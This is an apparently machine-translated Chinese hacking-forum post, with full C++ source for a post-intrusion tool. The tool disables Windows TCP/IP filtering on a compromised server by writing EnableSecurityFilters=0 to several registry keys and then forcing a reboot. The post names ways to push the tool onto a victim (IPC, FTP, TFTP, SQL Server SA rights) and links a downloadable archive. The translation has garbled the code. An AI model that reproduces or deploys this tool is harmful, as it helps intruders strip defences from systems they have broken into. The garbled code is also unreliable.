Article Source: Evil Eight Bao China
Author: evil cat [E.S.T] (EvilCat [E.S.T])
When the invasion is sometimes encountered to open a port similar to 3389 terminal, it is not connected to the terminal connector, which means that the other party may do TCP / IP screening. Everyone knows that the TCP / IP screening method is known. It is a modification of the registry. Export the registry in the other side's shell and then modify it, then the modified file is imported, then restart the other party, so it is more trouble, it is better to write a program, and the program is incorporated into the server. OK, maybe this is the benefit of the program. How to introduce this small thing into the other party server method, IPC, FTP, TFTP, with BAT restore, etc., if the SQLServer is SA permissions, it is easier. The program is relatively simple to be convenient, compiled under VC6.0, and the test passed by 2000 Advance Server SP4. code show as below:
/ * Copyright (C) 2005 Evil Eight Bao China Author: Cat [EST] (Evilcat [EST]) 4-3-2005 - * / # include #include void main (int argc, char * argv []) {HKEY hKey; HANDLE hProcess, hToken; TOKEN_PRIVILEGES NewState; DWORD ProcessId; LUID luidPrivilegeLUID; LPCTSTR key [] = { "SYSTEM // CurrentControlSet // Services // Tcpip // Parameters", "System // Tcpip // Parameters", "System // ControlSet002 // Services // Tcpip // Parameters"}; lpctstr name = "enableaseCurityFilters"; dWord dwording = 0; for (int i = 0; i <3; i ) {// open keyif (: regopenkeyex (HKEY_LOCAL_MACHINE, Key [i], 0, key_set_value, & hkey) == error_suCcess) {// set valueif (: regSetValueex (HKEY, NAME, 0 , REG_DWORD, Reinterpret_cast (& dwwvalue), sizeof (dwvalue))! = Error_success) {// Close Key :: regcloseKey (HKEY); // Error Handling; cout << "Error setting register ... / n "; return;}} else {// error handling; cout <<" Error Opening register ... / n "; return;}} processid = getCurrentProcessId (); hprocess = openprocess (process_all_access, false, processid) ; If (!! OpenProcessToken (hProcess, TOKEN_ADJUST_PRIVILEGES, & hToken) || LookupPrivilegeValue (NULL, SE_SHUTDOWN_NAME, & luidPrivilegeLUID)) {cout << "! Reboot system Error / n"; return;} NewState.PrivilegeCount = 1; NewState.Privileges [ 0] .Luid = luidPrivilegeLUID; NewState.Privileges [0] .Attributes = SE_PRIVILEGE_ENABLED; if (AdjustTokenPrivileges (hToken, FALSE, & NewState, NULL, NULL, NULL)) ExitWindowsEx (EWX_FORCE | EWX_REBOOT, 0); return;} http: / / www.neeao.com/lbs/attachments/month_200503/05_090416_nkcqevilcat.rar
